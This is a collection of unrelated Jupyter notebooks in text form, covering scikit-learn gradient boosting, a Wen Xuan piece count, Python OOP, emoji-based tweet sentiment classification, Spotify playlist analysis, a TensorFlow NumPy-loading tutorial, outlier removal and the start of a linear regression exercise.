id="JT7kf4LvpaAj" estados_escolidos = ['31 Minas Gerais', '51 Mat<NAME>', '53 Distrito Federal', '29 Bahia', '33 Rio de Janeiro'] # + colab={"base_uri": "https://localhost:8080/", "height": 512} id="RdQ6Q4G0pvcf" outputId="e032f0cb-41e7-494c-8e29-125cd47b59b4" dados_usaveis.loc[estados_escolidos].T.plot(figsize=(12, 8)) # + id="wOqRfBaepx3f"
modulo1/desafios/Desafio_aula2_modulo1.ipynb
# # 📝 Exercise M6.05 # # The aim of the exercise is to get familiar with the histogram # gradient-boosting in scikit-learn. Besides, we will use this model within # a cross-validation framework in order to inspect internal parameters found # via grid-search. # # We will use the California housing dataset. # + from sklearn.datasets import fetch_california_housing data, target = fetch_california_housing(return_X_y=True, as_frame=True) target *= 100 # rescale the target in k$ # - # First, create a histogram gradient boosting regressor. You can set the # trees number to be large, and configure the model to use early-stopping. # + # Write your code here. from sklearn.experimental import enable_hist_gradient_boosting from sklearn.ensemble import HistGradientBoostingRegressor histogram_gradient_boosting = HistGradientBoostingRegressor( max_iter=1000, early_stopping=True) histogram_gradient_boosting.fit(data, target) histogram_gradient_boosting.n_iter_ # - # We will use a grid-search to find some optimal parameter for this model. # In this grid-search, you should search for the following parameters: # # * `max_depth: [3, 8]`; # * `max_leaf_nodes: [15, 31]`; # * `learning_rate: [0.1, 1]`. # # Feel free to explore the space with additional values. Create the # grid-search providing the previous gradient boosting instance as the model. # + from sklearn.model_selection import GridSearchCV import pandas as pd # Write your code here. param_grid = { "max_depth": [3, 8], "max_leaf_nodes": [15, 31], "learning_rate": [0.1, 1], } grid_search = GridSearchCV( histogram_gradient_boosting, param_grid=param_grid, scoring="neg_mean_absolute_error", n_jobs=-1 ) grid_search.fit(data, target) columns = [f"param_{name}" for name in param_grid.keys()] columns += ["mean_test_score", "rank_test_score"] cv_results = pd.DataFrame(grid_search.cv_results_) cv_results["mean_test_score"] = -cv_results["mean_test_score"] cv_results[columns].sort_values(by="rank_test_score") # - # Finally, we will run our experiment through cross-validation. In this regard, # define a 5-fold cross-validation. Besides, be sure to shuffle the data. # Subsequently, use the function `sklearn.model_selection.cross_validate` # to run the cross-validation. You should also set `return_estimator=True`, # so that we can investigate the inner model trained via cross-validation. # + # Write your code here. from sklearn.model_selection import cross_validate from sklearn.model_selection import KFold cv = KFold(n_splits=5, shuffle=True, random_state=0) cv_results_hist = cross_validate( histogram_gradient_boosting, data, target, cv=cv, n_jobs=-1, return_estimator=True ) print("Hist Gradient Boosting Decision Tree") print(f"Mean absolute error via cross-validation: " f"{-cv_results_hist['test_score'].mean():.3f} +/- " f"{cv_results_hist['test_score'].std():.3f} k$") print(f"Average fit time: " f"{cv_results_hist['fit_time'].mean():.3f} seconds") print(f"Average score time: " f"{cv_results_hist['score_time'].mean():.3f} seconds") # - # Now that we got the cross-validation results, print out the mean and # standard deviation score. # Write your code here. # Then, inspect the `estimator` entry of the results and check the best # parameters values. Besides, check the number of trees used by the model. # Write your code here. for est in cv_results_hist['estimator']: # print(est.best_params_) print(f"# trees: {est.best_estimator_.n_iter_}") # Inspect the results of the inner CV for each estimator of the outer CV. # Aggregate the mean test score for each parameter combination and make a box # plot of these scores. # Write your code here.
notebooks/ensemble_ex_05.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from WenShuan import WenShuan from unicodedata import numeric # # WenShuan -- What happens to the number of separate pieces (765 comparing to 528) # # We noticed that the number of pieces in the `wenshuan.flat_bodies` is different from the number 761 listed in the https://en.wikipedia.org/wiki/Wen_Xuan . # ## Loading the Wenshuan class wenshuan = WenShuan('2018-06-08', 'MF') wenshuan.load_htmls() wenshuan.extract_paths() # extract the bookmarks wenshuan.get_author_bag() # get the bag of author names and comments wenshuan.extract_meta() # extract the meta data wenshuan.passages2tuples() # get the passsage into (text, comment) tuples wenshuan.heads2tuples() # get headers into (head, comment, ...) tuples wenshuan.extract_commentators() # append commentators to metadata wenshuan.extract_sound_glosses() # append all sound glosses in comments into a list and remove them from the self.flat_passages # ## Number of elements in the `paths` len(wenshuan.paths) # It is much less than the number listed in the wiki. # ## Counting the num pieces in the paths # # One possible hypothesis is that, in Han-Ji, they merged several pieces of works in one page. Therefore, we should count the difference between the actual number in `wenshuan.paths` and number stated in the `bookmark`. # # Note: `unicodedata.numeric` could convert Chinese integers into numeric numbers. # + # build a string list for chinese integer chinese_int = ['一','二','三','四','五','六','七','八','九'] # create a dict for str -> int chinese_int_dict = {} # I am playing dirty, create a list for decimal numbers chinese_decimal = ['十'] + [ digit + decimal for digit in chinese_int for decimal in ['十'] ] numerical_decimal = [10] + [ digit * decimal for digit in range(1, 10) for decimal in [10] ] # for digit for digit in chinese_int: chinese_int_dict[digit] = int(numeric( digit )) # for decimal for decimal,num in zip(chinese_decimal, numerical_decimal): chinese_int_dict[decimal] = num for digit in chinese_int: chinese_int_dict[decimal + digit] = num + int(numeric( digit )) chinese_int_dict # - # ## Examining the occurrence of number in the bookmarks # # # + import re # count the actual number of pieces (number of pages) of works in WenShuan paths paths_text = ''.join(wenshuan.paths) paths_dict = {} for element in set([element for path in wenshuan.paths for element in path.split('/') if '首' in element]): paths_dict[element] = paths_text.count(element) # + # count the difference between number in pages and number in bookmark difference = 0 for path, num_of_pieces in paths_dict.items(): # capture the number of pieces in the bookmarks for match in re.finditer(r'([一二三四五六七八九十]+?)首', path): num_in_path = chinese_int_dict[match.group(1)] # compage num_of_pieces (in pages) and num_in_path (in bookmark) if num_of_pieces != num_in_path: print("[Warning] Number of pieces are not match with the number in bookmark.", path, (num_of_pieces, num_in_path)) difference += num_in_path - num_of_pieces difference # - len(wenshuan.paths) + difference # It turns out very similar to the number in the wiki, so we are ok.
tutorials/WenShuan -- What happens to the number of separate pieces (76X comparing to 528).ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # %%HTML <style> div#notebook-container.container { /* This acts as a spacer between cells, that is outside the border */ margin: 2px 0px 2px 0px; list-style: none; padding: 0; margin: 0; -ms-box-orient: horizontal; display: -webkit-box; display: -moz-box; display: -ms-flexbox; display: -moz-flex; display: -webkit-flex; display: flex; justify-content: space-around; -webkit-flex-wrap: wrap; flex-wrap: wrap; -webkit-flex-direction: row; flex-direction: row; } div.cell { width:550px } </style> # The code on the left is a hack to make this notebook two-column. I found it here: # # http://stackoverflow.com/questions/23370670/ipython-notebook-put-code-cells-into-columns # # # # Object Oriented Programming (OOP) in Python # # Welcome to the OOP-session of our Python course! This notebook introduces Python's OOP-concepts in a two column-style side by side with an equivalent formulation in Java respectively. # # We chose Java here, as it is a popular OOP-enabled language that many of you are probably familiar with. Also, we found it helpful to compare Python-style to *some* other language and Java-OOP is still somewhat easier to read than OOP in C-ish languages. # ## Basic class with constructor etc # # **Python** # ##   # # **Java** # ```python # class SpaceShip(SpaceObject): # bgColor = (0, 0, 0, 0) # # def __init__(color, position): # super(SpaceShip, self).__init__( # position) # self.color = color # # def fly(self, moveVector): # self.position += moveVector # # @staticmethod # def get_bgColor(): # return SpaceShip.bgColor # ``` # # # See https://julien.danjou.info/blog/2013/guide-python-static-class-abstract-methods for a guide about the decorators `@staticmethod`, `@classmethod` and `abstractmethod`. # # Classmethods have no equivalent in Java. They are like special static methods that get the class as their initial, implicit argument: # # ```python # @classmethod # def get_bgColor(cls): # return cls.bgColor # ``` # ```java # public class SpaceShip extends SpaceObject { # public static Color bgColor = # new Color(0, 0, 0, 0); # public Color color; # # public SpaceShip(Color col, Vec3D pos) { # super(pos); # color = col; # } # # public void fly(Vec3D move) { # position.add(move); # } # # public static Color get_bgColor() { # return bgColor; # } # } # ``` # ## Abstract classes # # ```python # from abc import ABCMeta # # class Target(): # __metaclass__ = ABCMeta # # @abstractmethod # def hit(self, strength): # pass # ``` # ```java # public interface Target { # public void hit(double strength); # } # //or # public abstract class Target { # public abstract void hit(double strength); # } # ``` # ## Multiple inheritance # # ```python # class SpaceShip(SpaceObject, Target): # # def hit(self, strength): # print "Damn I'm hit." # ``` # ```java # public class SpaceShip extends SpaceObject # implements Target { # # public void hit(double strength) { # System.out.println("Damn I'm hit."); # } # } # ``` # ```python # class Hitpoints(Target): # def __init__(self): # self.hitpoints = 100 # # def hit(self, strength): # self.hitpoints -= strength # # # class SpaceShip(SpaceObject, Hitpoints): # def __init__(self): # Hitpoints.__init__(self) # super(SpaceShip, self).__init__() # ``` # ```java # public class HitpointSpaceShip extends # SpaceShip implements Hitpoints { # double hitpoints = 100.0; # } # # public interface Hitpoints extends Target { # //Java 8 introduced default-implementations: # default void hit(double strength) { # ((HitpointSpaceShip) this).hitpoints -= # strength; # } # } # ``` # ## Overloading operators # # ```python # class Fraction(): # # def __init__(self, numerator,denominator): # self.num = numerator # self.den = denominator # # def __mul__(self, other): # return Fraction(self.num * other.num, # self.den * other.den) # ``` # Overview of magic methods: # # http://www.rafekettler.com/magicmethods.html # ### Task: # # Implement numerical and logical magic methods. (How many can you get done in the available time?) # # Also consider the idea that numerator and denominator are functions, e.g. numpy.polynomial.polynomial. In this case Fraction shall also act as a function. How can you achieve this? # # # # ## New-style classes # # __Classic class:__ # Original essay about new-style classes by <NAME>: # https://www.python.org/download/releases/2.2.3/descrintro/ # # __New-style class:__ # + class classA(): pass a = classA() print type(a) # + class classA(object): pass a = classA() print type(a) # - # ### Extending built-in types # # Note that multi-inheritence is constrained to one built-in type only. You cannot extend multiple built-in types. # # + class evenInt(int): def __init__(self, value): if value % 2 != 0: raise ValueError(str(value)+ ' is not even') super(evenInt, self).__init__(value) a = evenInt(24) b = 9 a+b # + class defaultdict(dict): def __init__(self, default=None): dict.__init__(self) self.default = default def __getitem__(self, key): try: return dict.__getitem__(self, key) except KeyError: return self.default a = defaultdict(default=0.0) print a a['x1'] = 1 print a['x1'] print a print a['x2'] a.y = '7' print a.y print a.__dict__ # - # ### Slots # # Slots can replace the mutable class-dictionary `__dict__` by a fixed data structure. `__slots__` disallows adding or removing attributes to a class. # Its main purpose is to avoid the need of lots of dictionaries when something simple like `int` is subclassed. # # Basic slot-example: # ## # #### # #### # You cannot modify slots afterwards (well, you can, but it doesn't add the attribute): # + class defaultdict(dict): __slots__ = ['default'] def __init__(self, default=None): dict.__init__(self) self.default = default def __getitem__(self, key): try: return dict.__getitem__(self, key) except KeyError: return self.default a = defaultdict(default=0.0) print a a['x1'] = 1 print a['x1'] print a print a['x2'] #a.y = '7' #print a.y #print a.__dict__ print a.__slots__ # + class defaultdict(dict): __slots__ = ['default'] def __init__(self, default=None): dict.__init__(self) self.default = default def __getitem__(self, key): try: return dict.__getitem__(self, key) except KeyError: return self.default a = defaultdict(default=0.0) print a a['x1'] = 1 print a['x1'] print a print a['x2'] #a.y = '7' #print a.y #print a.__dict__ print a.__slots__ a.__slots__.append('y') print a.__slots__ a.y = '7' print a.y # - # Some notes on slots: # # - cannot be used in not-only-`__slot__` subclasses # - There's no check to prevent name conflicts # between the slots defined in a class and the # slots defined in its base classes # - You cannot use slots with "variable-length" # built-in types as base class. Variable-length # built-in types are long, str and tuple.
notebooks/Python OOP.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + jupyter={"outputs_hidden": false} # %load_ext autoreload # %autoreload 2 import math import gensim.models as gs import pickle as pk import sklearn.metrics as met import scipy.stats as stats import numpy as np from sklearn import cross_validation from sklearn.linear_model import SGDClassifier from sklearn.ensemble import RandomForestClassifier import twitter_sentiment_dataset as tsd import phrase2vec as p2v from twitter_sentiment_dataset import TweetTrainingExample from model import ModelParams # - # # Setup # Load the three vector representations from files. In general, any variable with the word 'none' in it refers to Google News word2vec w/o any emoji vectors, 'ours' to Google News word2vec w/ vectors we trained, and 'theirs' to Google News word2vec with the vectors trained by Barbieri et. al. # + jupyter={"outputs_hidden": true} w2v_path='./data/word2vec/google_w2v_without_emoji.bin' in_dim = 300 # Length of word2vec vectors out_dim = 300 # Desired dimension of output vectors pos_ex = 4 neg_ratio = 1 max_epochs = 40 dropout = 0.0 params = ModelParams(in_dim=in_dim, out_dim=out_dim, pos_ex=pos_ex, max_epochs=max_epochs, neg_ratio=neg_ratio, learning_rate=0.001, dropout=dropout, class_threshold=0.5) e2v_ours_path = params.model_folder('unicode') + '/emoji2vec.bin' e2v_theirs_path = './data/word2vec/emoji_subset_theirs.bin' # + jupyter={"outputs_hidden": false} w2v = gs.Word2Vec.load_word2vec_format(w2v_path, binary=True) e2v_ours = gs.Word2Vec.load_word2vec_format(e2v_ours_path, binary=True) e2v_theirs = gs.Word2Vec.load_word2vec_format(e2v_theirs_path, binary=True) # + jupyter={"outputs_hidden": true} p2v_no_emoji = p2v.Phrase2Vec(out_dim, w2v, e2v=None) p2v_our_emoji = p2v.Phrase2Vec(out_dim, w2v, e2v=e2v_ours) p2v_their_emoji = p2v.Phrase2Vec(out_dim, w2v, e2v=e2v_theirs) # - # Using stats scraped from emojitracker.com at a certain point in time, we generate two sets of emoji: the top 173 most frequently used emoji, whose usage constitutes 90% of emoji usage on Twitter, and the bottom 612 least frequently used emoji, whose usage constitutes 10% of emoji usage on Twitter. # # Subsequently, 'common' will refer to the former group, while 'rare' will refer to the latter. # + jupyter={"outputs_hidden": false} p = open('./data/tweets/frequencies_w_emoji.txt', 'r') ems = p.readlines() ems = [l.split('\t')[0] for l in ems] p.close() top90 = set(ems[:173]) bottom10 = set(ems[173:]) p.close() # + jupyter={"outputs_hidden": true} def emoji_dataset_stats(tweets): total_tweets = len(tweets) total_emoji = tsd.num_tweets_with_emoji(tweets, e2v_ours, e2v_theirs, ems) top_90_total = tsd.num_tweets_with_emoji(tweets, set(), set(), top90) bottom_10_total = tsd.num_tweets_with_emoji(tweets, set(), set(), bottom10) return total_tweets, total_emoji, top_90_total, bottom_10_total # - # Statistics for the entire Twitter corpus. Counts refer to # of tweets containing emoji of a type. # + jupyter={"outputs_hidden": false} train_tweets, test_tweets = tsd.load_training_test_sets() print('All Tweets in corpus: %s, total emoji: %s, common emoji: %s, rare emoji: %s' % emoji_dataset_stats(tsd.get_all_examples())) print('Training set: total tweets: %s, total emoji: %s, common emoji: %s, rare emoji: %s' % emoji_dataset_stats(train_tweets)) print('Test set: total tweets: %s, total emoji: %s, common emoji: %s, rare emoji: %s' % emoji_dataset_stats(test_tweets)) # + jupyter={"outputs_hidden": false} def emoji_dataset_label_stats(tweets): res = dict() res['Positive'] = 0 res['Negative'] = 0 res['Neutral'] = 0 for tweet in tweets: res[tweet.label] += 1/len(tweets) print(res) # + jupyter={"outputs_hidden": false} emoji_dataset_label_stats(train_tweets) emoji_dataset_label_stats(test_tweets) # - # ## Prepare Training and Testing Vectors # Given the raw training and test tweets, calculate the vector representations for each tweet for each model. # + jupyter={"outputs_hidden": false} train_none, train_y = tsd.prepare_tweet_vector_averages(train_tweets, p2v_no_emoji) train_ours, _ = tsd.prepare_tweet_vector_averages(train_tweets, p2v_our_emoji) train_theirs, _ = tsd.prepare_tweet_vector_averages(train_tweets, p2v_their_emoji) # + jupyter={"outputs_hidden": false} test_none, test_y = tsd.prepare_tweet_vector_averages(test_tweets, p2v_no_emoji) test_ours, _ = tsd.prepare_tweet_vector_averages(test_tweets, p2v_our_emoji) test_theirs, _ = tsd.prepare_tweet_vector_averages(test_tweets, p2v_their_emoji) # - # # Classification # + jupyter={"outputs_hidden": false} classifiers = { 'SGD (n_iter=50)' : SGDClassifier(n_iter=50), 'Random Forest (n_estimators=60)' : RandomForestClassifier(n_estimators=60) } # + jupyter={"outputs_hidden": true} def train_all_with_cross_validation(train_none, train_ours, train_theirs, train_y, clf, clf_name, cv=5): scores_none = cross_validation.cross_val_score(clf, train_none, train_y, cv=cv) print("None: %s Train Accuracy: %0.2f (+/- %0.3f)" % (clf_name, scores_none.mean(), scores_none.std() * 2)) scores_ours = cross_validation.cross_val_score(clf, train_ours, train_y, cv=cv) print("Ours: %s Train Accuracy: %0.2f (+/- %0.3f)" % (clf_name, scores_ours.mean(), scores_ours.std() * 2)) scores_theirs = cross_validation.cross_val_score(clf, train_theirs, train_y, cv=cv) print("Theirs: %s Train Accuracy: %0.2f (+/- %0.3f)" % (clf_name, scores_theirs.mean(), scores_theirs.std() * 2)) # + jupyter={"outputs_hidden": true} def train_and_predict(train_data, train_y, test_data, test_y, clf): clf.fit(train_data, train_y) predictions = clf.predict(test_data) score = met.accuracy_score(test_y, predictions) f1 = met.f1_score(test_y, predictions, average='weighted') return predictions, score, f1 # + jupyter={"outputs_hidden": true} def train_and_predict_all(train_none, test_none, train_ours, test_ours, train_theirs, test_theirs, test_y, clf, clf_name): none_pred, none_acc, none_f1 = train_and_predict(train_none, train_y, test_none, test_y, clf) print('None: %s Test Accuracy: %0.5f, f1=%0.5f' % (clf_name, none_acc, none_f1)) ours_pred, ours_acc, ours_f1 = train_and_predict(train_ours, train_y, test_ours, test_y, clf) ours_p = tsd.calculate_mcnemars(none_pred, ours_pred, test_y) print('Ours: %s Test Accuracy: %0.5f, p=%0.5f, f1=%0.5f' % (clf_name, ours_acc, ours_p, ours_f1)) theirs_pred, theirs_acc, theirs_f1 = train_and_predict(train_theirs, train_y, test_theirs, test_y, clf) theirs_p = tsd.calculate_mcnemars(none_pred, theirs_pred, test_y) print('Theirs: %s Test Accuracy: %0.5f, p=%0.5f, f1=%0.5f' % (clf_name, theirs_acc, theirs_p, theirs_f1)) ours_theirs_p = tsd.calculate_mcnemars(ours_pred, theirs_pred, test_y) print('Significance between ours and theirs: p=%0.5f' % ours_theirs_p) # - # ## Performance on Training Set and Complete Test Set # For each classifier, we calculate the average performance of the classifier on the training set when cross validation is applied, as well as the accuracy on the complete test set. # + jupyter={"outputs_hidden": false} for clf_name, clf in classifiers.items(): print(clf_name) print() print('Cross Validation Accuracy on Training Set\n') train_all_with_cross_validation(train_none, train_ours, train_theirs, train_y, clf, clf_name, cv=5) print() print('Accuracy on Test Set\n') train_and_predict_all(train_none, test_none, train_ours, test_ours, train_theirs, test_theirs, test_y, clf, clf_name) print() # + jupyter={"outputs_hidden": true} def train_and_predict_all_on_test_subset(test_tweets, clf, clf_name): test_none, test_y = tsd.prepare_tweet_vector_averages(test_tweets, p2v_no_emoji) test_ours, _ = tsd.prepare_tweet_vector_averages(test_tweets, p2v_our_emoji) test_theirs, _ = tsd.prepare_tweet_vector_averages(test_tweets, p2v_their_emoji) train_and_predict_all(train_none, test_none, train_ours, test_ours, train_theirs, test_theirs, test_y, clf, clf_name) # + jupyter={"outputs_hidden": true} emoji_test_tweets = tsd.get_tweets_with_emoji(test_tweets, e2v_ours, e2v_theirs, ems) emoji_test_tweets_top90 = tsd.get_tweets_with_emoji(test_tweets, set(), set(), top90) emoji_test_tweets_bottom10 = tsd.get_tweets_with_emoji(test_tweets, set(), set(), bottom10) # - # ## Test Subset - All Tweets with Emoji # For each classifier, we calculate the accuracy on the subset of test examples that contain emoji. # + jupyter={"outputs_hidden": false} for clf_name, clf in classifiers.items(): print(clf_name) train_and_predict_all_on_test_subset(emoji_test_tweets, clf, clf_name) print() # - # ## Test Subset - All Tweets with Common Emoji # For each classifier, we calculate the accuracy on the subset of test examples that contain common (Top 90%) emoji. # + jupyter={"outputs_hidden": false} for clf_name, clf in classifiers.items(): print(clf_name) train_and_predict_all_on_test_subset(emoji_test_tweets_top90, clf, clf_name) print() # - # ## Test Subset - All Tweets with Rare Emoji # For each classifier, we calculate the accuracy on the subset of test examples that contain rare (Bottom 10%) emoji. # + jupyter={"outputs_hidden": false} for clf_name, clf in classifiers.items(): print(clf_name) train_and_predict_all_on_test_subset(emoji_test_tweets_bottom10, clf, clf_name) print() # + jupyter={"outputs_hidden": true}
TwitterClassification.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # EDA import pickle import seaborn as sns import numpy as np import pandas as pd import matplotlib import matplotlib.pyplot as plt import matplotlib.ticker as tick import sys import os # %matplotlib inline plt.style.use('seaborn') # ## Spotify API Data # + ''' Load Data (see data retrieval notebook)''' with open('aggregate_data.p', 'rb') as f: data = pickle.load(f) cats = data['category'] data = data[[x for x in data.columns if x != 'category']].astype(float) data['category'] = cats #split into train / test to avoid cheating np.random.seed(1234) train_pct = .5 msk = np.random.uniform(0,1,len(data)) < train_pct train = data.loc[msk, :] test = data.loc[~msk, :] avgs = train.groupby('category').mean() # - # ### What Playlist categories tend to have the most followers? pd.Series(avgs['num_followers']).sort_values(ascending = False).plot(kind = 'bar') plt.xlabel('Spotify Playlist Category', fontsize = 20) plt.ylabel('Average Number of Followers', fontsize = 20) plt.title('Average Number of Playlist Followers by Spotify Playlist Category', fontsize = 20) plt.show() # ### What does the distribution of the number of followers look like? # + ''' Note that this is pretty skewed (many more playlists have a small # of followers) ''' ax = train['num_followers'].hist(weights = np.zeros_like(train['num_followers']) + 1. / train['num_followers'].size) plt.title('Histogram of Number Of Followers of Spotify Playlists', fontsize = 20) plt.xlabel('Number of Followers (in Millions)', fontsize = 20) plt.ylabel('Percent of Training Dataset', fontsize = 20) ax.yaxis.set_major_formatter(tick.FuncFormatter(lambda y, _: '{:.0%}'.format(y))) plt.show() sns.boxplot(train['num_followers']) plt.title('Distribution of Number of Followers of a Playlist', fontsize = 20) plt.xlabel('Number of Followers (in millions)', fontsize = 20) plt.show() # - # ### Which categories tend to have the most popular songs? ''' Note that this is slightly different than above; the 'Party' category tends to have the most popular songs in it. Apparently no one really likes classical music. ''' avgs['popularity_mean'].sort_values(ascending = False).plot(kind = 'bar') plt.xlabel('Spotify Playlist Category', fontsize = 20) plt.ylabel('Average Popularity of Songs', fontsize = 20) plt.title('Average Popularity of Songs by Spotify Playlist Category', fontsize = 20) plt.show() # ### How are our quantitative variables correlated? # + ''' Note that the features that tend to be most correlated with number of followers generally make sense; they are popularity, artist and song 'hotttnesss,' artist familiarity, and whether or not the playlist is featured. ''' quant_vars = np.sort([x for x in data.columns if x not in ['category','num_follower']]) # remove some variables for readability quant_vars = [x for x in quant_vars if '_median' not in x] quant_vars = [x for x in quant_vars if '_min' not in x] quant_vars = [x for x in quant_vars if '_max' not in x] corr = data[ quant_vars + ['num_followers']].astype(float).corr() # Set up the matplotlib figure f, ax = plt.subplots(figsize=(20, 20)) # Generate a mask for the upper triangle mask = np.zeros_like(corr, dtype=np.bool) mask[np.triu_indices_from(mask)] = True # Generate a custom diverging colormap cmap = sns.diverging_palette(10, 150, as_cmap=True) # Draw the heatmap with the mask and correct aspect ratio sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0, square=True, linewidths=.5, cbar_kws={"shrink": .5}) plt.title('Correlations Among Quantitative Playlist Features', fontsize = 20) plt.show() # - # ## Million Songs Data # ### Artist Familiarity # + '''EDA of MSD Data -- these generally go in the correct direction + make sense given correlation data''' data.plot('artist_famil_mean', 'num_followers' ,kind = 'scatter') plt.xlabel('Average Artist Familiarity', fontsize = 20) plt.ylabel('Number of Followers', fontsize = 20) plt.title('Average Artist Familiarity v. Number of Followers', fontsize = 20) plt.show() # - # ### Artist Hotttnesss data.plot('artist_hot_mean', 'num_followers' ,kind = 'scatter') plt.xlabel('Average Artist Hotttnesss', fontsize = 20) plt.ylabel('Number of Followers', fontsize = 20) plt.title('Average Artist Hotttnesss v. Number of Followers', fontsize = 20) plt.show() # ### Song Hotttnesss data.plot('song_hot_mean', 'num_followers' ,kind = 'scatter') plt.xlabel('Average Song Hotttnesss', fontsize = 20) plt.ylabel('Number of Followers', fontsize = 20) plt.title('Average Song Hotttnesss v. Number of Followers', fontsize = 20) plt.show() # ### Song Popularity Compared to Hotttnesss '''These are positively correlated, which makes sense, but not perfectly so; there is colinearity but they are not the same metric (so both could theoretically have predictive power)''' data.plot('song_hot_mean', 'popularity_mean' ,kind = 'scatter') plt.xlabel('Average Song Hotttnesss', fontsize = 20) plt.ylabel('Average Song Popularity', fontsize = 20) plt.title('Average Song Hotttnesss v. Average Song Popularity', fontsize = 20) plt.show()
notebooks/EDA.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="pixDvex9KBqt" # ##### Copyright 2019 The TensorFlow Authors. # + cellView="form" id="K16pBM8mKK7a" #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # + [markdown] id="TfRdquslKbO3" # # tf.data を使って NumPy データをロードする # + [markdown] id="-uq3F0ggKlZb" # <table class="tfo-notebook-buttons" align="left"> # <td><a target="_blank" href="https://www.tensorflow.org/tutorials/load_data/numpy"><img src="https://www.tensorflow.org/images/tf_logo_32px.png">View on TensorFlow.org</a></td> # <td><a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/ja/tutorials/load_data/numpy.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png">Run in Google Colab</a></td> # <td><a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/ja/tutorials/load_data/numpy.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png">View source on GitHub</a></td> # <td><a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/ja/tutorials/load_data/numpy.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png">Download notebook</a></td> # </table> # + [markdown] id="-0tqX8qkXZEj" # このチュートリアルでは、NumPy 配列から `tf.data.Dataset` にデータを読み込む例を示します。 # # この例では、MNIST データセットを `.npz` ファイルから読み込みますが、 NumPy 配列がどこに入っているかは重要ではありません。 # # + [markdown] id="-Ze5IBx9clLB" # ## 設定 # + id="k6J3JzK5NxQ6" import numpy as np import tensorflow as tf # + [markdown] id="G0yWiN8-cpDb" # ### `.npz` ファイルからのロード # + id="GLHNrFM6RWoM" DATA_URL = 'https://storage.googleapis.com/tensorflow/tf-keras-datasets/mnist.npz' path = tf.keras.utils.get_file('mnist.npz', DATA_URL) with np.load(path) as data: train_examples = data['x_train'] train_labels = data['y_train'] test_examples = data['x_test'] test_labels = data['y_test'] # + [markdown] id="cCeCkvrDgCMM" # ## `tf.data.Dataset` を使って NumPy 配列をロード # + [markdown] id="tslB0tJPgB-2" # サンプルの配列と対応するラベルの配列があるとします。 `tf.data.Dataset.from_tensor_slices` にこれら2つの配列をタプルとして入力し、`tf.data.Dataset` を作成します。 # + id="QN_8wwc5R7Qm" train_dataset = tf.data.Dataset.from_tensor_slices((train_examples, train_labels)) test_dataset = tf.data.Dataset.from_tensor_slices((test_examples, test_labels)) # + [markdown] id="6Rco85bbkDfN" # ## データセットの使用 # + [markdown] id="0dvl1uUukc4K" # ### データセットのシャッフルとバッチ化 # + id="GTXdRMPcSXZj" BATCH_SIZE = 64 SHUFFLE_BUFFER_SIZE = 100 train_dataset = train_dataset.shuffle(SHUFFLE_BUFFER_SIZE).batch(BATCH_SIZE) test_dataset = test_dataset.batch(BATCH_SIZE) # + [markdown] id="w69Jl8k6lilg" # ### モデルの構築と訓練 # + id="Uhxr8py4DkDN" model = tf.keras.Sequential([ tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(128, activation='relu'), tf.keras.layers.Dense(10) ]) model.compile(optimizer=tf.keras.optimizers.RMSprop(), loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=['sparse_categorical_accuracy']) # + id="XLDzlPGgOHBx" model.fit(train_dataset, epochs=10) # + id="2q82yN8mmKIE" model.evaluate(test_dataset)
site/ja/tutorials/load_data/numpy.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import pandas as pd import numpy as np df=pd.read_csv("weight.csv") df df.drop("Gender",axis=1,inplace=True) df df.boxplot() from scipy import stats z=np.abs(stats.zscore(df)) z df1=df.copy() df1=df1[(z<3).all(axis=1)] df1 df1.boxplot() df2=df.copy() q1=df2.quantile(0.25) q3=df2.quantile(0.75) IQR=q3-q1 df2_new=df2[((df2>=q1-1.5*IQR)&(df2<=q3+1.5*IQR)).all(axis=1)] df2_new.boxplot() df2_new
2.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # Machine Learning Exercise 1 - Linear Regression # This notebook covers a Python-based solution for the first programming exercise of the machine learning class on Coursera. Please refer to the [exercise text](https://github.com/jdwittenauer/ipython-notebooks/blob/master/exercises/ML/ex1.pdf) for detailed descriptions and equations. # # In this exercise we'll implement simple linear regression using gradient descent and apply it to an example problem. We'll also extend our implementation to handle multiple variables and apply it to a slightly more difficult example. # ## Linear regression with one variable # In the first part of the exercise, we're tasked with implementing linear regression with one variable to predict profits for a food truck. Suppose you are the CEO of a restaurant franchise and are considering different cities for opening a new outlet. The chain already has trucks in various cities and you have data for profits and populations from the cities. # Let's start by importing some libraries and examining the data. import numpy as np import pandas as pd import matplotlib.pyplot as plt # %matplotlib inline data = pd.read_csv('mlex1.csv', header=None, names=['Population', 'Profit']) data.head() data.describe() # Let's plot 